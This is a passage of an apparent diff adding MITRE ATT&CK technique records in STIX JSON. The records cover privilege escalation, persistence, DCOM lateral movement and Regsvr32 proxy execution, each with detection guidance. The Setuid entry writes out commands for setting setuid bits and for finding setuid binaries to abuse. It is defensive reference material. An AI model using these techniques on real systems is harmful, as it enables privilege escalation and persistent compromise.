~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\n\nIdentify new services executed from plist modified in the previous user's session. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", + "created": "2020-01-24T20:02:59.149Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/011", + "external_id": "T1547.011" + }, + { + "source_name": "fileinfo plist file description", + "description": "FileInfo.com team. (2019, November 26). .PLIST File Extension. Retrieved October 12, 2021.", + "url": "https://fileinfo.com/extension/plist" + }, + { + "source_name": "wardle artofmalware volume1", + "description": "Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.", + "url": "https://taomm.org/vol1/pdfs.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-15T20:52:09.908Z", + "name": "Abuse Elevation Control Mechanism", + "description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.(Citation: TechNet How UAC Works)(Citation: sudo man page 2018) An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.(Citation: OSX Keydnap malware)(Citation: Fortinet Fareit)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).\n\nConsider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.\n\nOn Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.\n\nThere are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "IaaS", + "Google Workspace", + "Azure AD" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "created": "2020-01-30T13:58:14.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548", + "external_id": "T1548" + }, + { + "source_name": "TechNet How UAC Works", + "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works" + }, + { + "source_name": "OSX Keydnap malware", + "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", + "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" + }, + { + "source_name": "Fortinet Fareit", + "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.", + "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware" + }, + { + "source_name": "sudo man page 2018", + "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", + "url": "https://www.sudo.ws/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Create Process with Token", + "description": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\n\nCreating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.\n\nWhile this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Vadim Khrykov", + "Jonny Johnson" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If an adversary is using a standard command-line shell (i.e. [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.\n\nAnalysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Windows User Account Control", + "System access controls", + "File system access controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", + "created": "2020-02-18T16:48:56.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1134/002", + "external_id": "T1134.002" + }, + { + "source_name": "Microsoft Command-line Logging", + "description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.", + "url": "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing" + }, + { + "source_name": "Microsoft RunAs", + "description": "Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Setuid and Setgid", + "description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgid bit, chmod 2775 and chmod g+s can be used.\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions.\n\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", + "created": "2020-01-30T14:11:41.212Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548/001", + "external_id": "T1548.001" + }, + { + "source_name": "GTFOBins Suid", + "description": "Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022.", + "url": "https://gtfobins.github.io/#+suid" + }, + { + "source_name": "OSX Keydnap malware", + "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", + "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/" + }, + { + "source_name": "setuid man page", + "description": "Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.", + "url": "http://man7.org/linux/man-pages/man2/setuid.2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-14T21:24:37.780Z", + "name": "Winlogon Helper DLL", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013) \n\nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on\n\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "SYSTEM", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35", + "created": "2020-01-24T16:59:59.688Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/004", + "external_id": "T1547.004" + }, + { + "source_name": "Cylance Reg Persistence Sept 2013", + "description": "Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.", + "url": "https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "System Firmware", + "description": "The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Ryan Becwar", + "McAfee" + ], + "x_mitre_detection": "System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.\n\nLikewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6856ddd6-2df3-4379-8b87-284603c189c3", + "created": "2017-05-31T21:30:28.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1019", + "external_id": "T1019" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/532.html", + "external_id": "CAPEC-532" + }, + { + "source_name": "Wikipedia BIOS", + "description": "Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016.", + "url": "https://en.wikipedia.org/wiki/BIOS" + }, + { + "source_name": "Wikipedia UEFI", + "description": "Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.", + "url": "https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface" + }, + { + "source_name": "About UEFI", + "description": "UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016.", + "url": "http://www.uefi.org/about" + }, + { + "source_name": "MITRE Trustworthy Firmware Measurement", + "description": "Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.", + "url": "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research" + }, + { + "source_name": "MITRE Copernicus", + "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.", + "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" + }, + { + "source_name": "McAfee CHIPSEC Blog", + "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", + "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/" + }, + { + "source_name": "Github CHIPSEC", + "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", + "url": "https://github.com/chipsec/chipsec" + }, + { + "source_name": "Intel HackingTeam UEFI Rootkit", + "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017.", + "url": "http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-11T20:21:55.610Z", + "name": "Distributed Component Object Model", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", + "created": "2020-02-11T18:26:36.444Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021/003", + "external_id": "T1021.003" + }, + { + "source_name": "Fireeye Hunting COM June 2019", + "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html" + }, + { + "source_name": "Microsoft COM", + "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx" + }, + { + "source_name": "Microsoft COM ACL", + "description": "Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.", + "url": "https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1" + }, + { + "source_name": "Microsoft Process Wide Com Keys", + "description": "Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.", + "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx" + }, + { + "source_name": "MSDN WMI", + "description": "Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/aa394582.aspx" + }, + { + "source_name": "Enigma DCOM Lateral Movement Jan 2017", + "description": "Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" + }, + { + "source_name": "Enigma MMC20 COM Jan 2017", + "description": "Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" + }, + { + "source_name": "Enigma Outlook DCOM Lateral Movement Nov 2017", + "description": "Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/" + }, + { + "source_name": "Enigma Excel DCOM Sept 2017", + "description": "Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/" + }, + { + "source_name": "Cyberreason DCOM DDE Lateral Movement Nov 2017", + "description": "Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.", + "url": "https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Change Default File Association", + "description": "When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command. For example:\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Stefan Kanthak", + "Travis Smith, Tripwire" + ], + "x_mitre_detection": "Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. \n\nUser file association preferences are stored under [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys.\n\nAlso look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--68c96494-1a50-403e-8844-69a6af278c68", + "created": "2017-05-31T21:30:42.222Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1042", + "external_id": "T1042" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/556.html", + "external_id": "CAPEC-556" + }, + { + "source_name": "Microsoft Change Default Programs", + "description": "Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016.", + "url": "https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs" + }, + { + "source_name": "Microsoft File Handlers", + "description": "Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/bb166549.aspx" + }, + { + "source_name": "Microsoft Assoc Oct 2017", + "description": "Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018.", + "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/assoc" + }, + { + "source_name": "TrendMicro TROJ-FAKEAV OCT 2012", + "description": "Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Regsvr32", + "description": "Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)\n\nAdversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.\n\nRegsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Casey Smith" + ], + 